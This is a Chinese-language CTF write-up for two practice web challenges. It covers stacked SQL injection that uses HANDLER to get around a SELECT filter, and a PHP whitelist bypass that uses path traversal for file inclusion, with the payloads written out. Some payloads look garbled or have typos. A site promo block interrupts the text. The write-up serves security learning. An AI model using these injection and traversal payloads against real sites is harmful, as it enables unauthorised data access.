攻防世界 Web 题解涵盖 SQL 注入与文件包含漏洞。Supersqli 题目中,攻击者通过堆叠注入发现特殊表,利用 handler 语句替代 select 绕过关键字过滤获取 flag。Warmup 题目存在 PHP 文件包含,通过构造特定 URL 参数绕过白名单检查及路径截取逻辑,读取隐藏文件获取 flag。重点在于 SQL 注入绕过技巧与 PHP 代码审计中的文件包含漏洞利用方法。
打开页面如图所示,初步筛查这应该是一道 SQL 注入题。
确认为 SQL 注入题。
1' or 1=1 #
接下来查询字段数。
字段数为 2。
1' order by 2 #
尝试查询数据库,正常查询发现不行,被过滤了。
但是没有过滤分号,那就可以堆叠注入联合 show。
1';show tables ;#
成功查询到一个特殊的表。
1';show columns from
1919810931114514;#
查询发现此表含 flag,但 select 被过滤,如何查询 flag?
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
利用 handler 代替 select 查询。
payload: 1';handler
1919810931114514open asa;handleraread next;#
查询该表的数据,成功拿到 flag。
点开发现有提示 source.php。
访问 source.php 和 hint.php。
是一堆代码,进行代码审计。
访问 hint.php 提示我们 flag 在 fffffllllaaaagggg。
<?php highlight_file(__FILE__); //代码高亮
class emmm {
public static function checkFile(&$page) //checkFile 用于检查文件参数是否合法 &$page 表示通过引用传递参数,这样在函数内部对 $page 的修改会影响到函数外部的变量。
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //定义一个白名单数组,里面包含允许包含的文件名(source.php 和 hint.php)
if (! isset($page) || !is_string($page)) { //第一个 if 功能为检查$page 是否存在且为字符串类型如果不是则返回 false
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) { ///检查$page 是否存在于白名单中存在则返回 true
return true;
}
$_page = mb_substr( //截取$page 中?之前的部分存在$_page(mb_substr 是字符串截取函数,mb_strpos 是字符串查找函数)
$page, 0, mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) { //检查截取后$_page 是否在白名单中存在则返回 true
return true;
}
$_page = urldecode($page); //对$page 进行 url 解码
$_page = mb_substr( //截取?之前的部分存在$_page 中
$_page, 0, mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) { //检查解码并截取后的$_page 是否在白名单中存在则返回 true
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])) //也就是说只有过掉 checkFile 方法才可以包含文件
{
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
经过如上审计我们得知如果想要拿到 flag 就需过掉 checkFile 方法。checkFile 方法有四个 if 判断语句:
总得来说我们正常包含文件时 /source.php?file=........
但是他第三和第四个判断语句只截取?之前的而 file 则被筛掉导致无法包含。
所以只要我们变换一下顺序即可且第二个到第四个 if 判断只要有一个绕过即可。
Payload: ?file=source.php?../../../../../../ffffllllaaaagggg (绕过第三个 if 判断) Payload: /source.php?file=source.php?../../../../../../ffffllllaaaagggg(这样也可以)
成功拿到 flag。
漏洞类型:SQL 注入
考察点:绕过过滤和堆叠注入技巧
解题要点:
select, update, delete 等。; 进行堆叠注入。prepare 和 execute 预处理语句绕过过滤。handler 语句代替 select 进行数据读取。关键 payload:
1';handler
1919810931114514open asa;handleraread first;#
学习收获:
漏洞类型:代码审计与文件包含
解题要点:
source.php。../ 和 ..\ 的过滤。checkFile 函数进行白名单检查。../../../../ 绕过检查。file=source.php?../../../../../ffffllllaaaagggg。学习收获:
| 方面 | Supersqli | Warmup |
|---|---|---|
| 漏洞类型 | SQL 注入 | 文件包含 |
| 主要技巧 | 堆叠注入、预处理语句、handler 语法 | 目录遍历、白名单绕过 |
| 过滤机制 | 关键字过滤 | 路径符号过滤 |
| 解题关键 | 找到未被过滤的替代语法 | 构造足够深的目录结构绕过检查 |
| 难度等级 | 简单 | 简单 |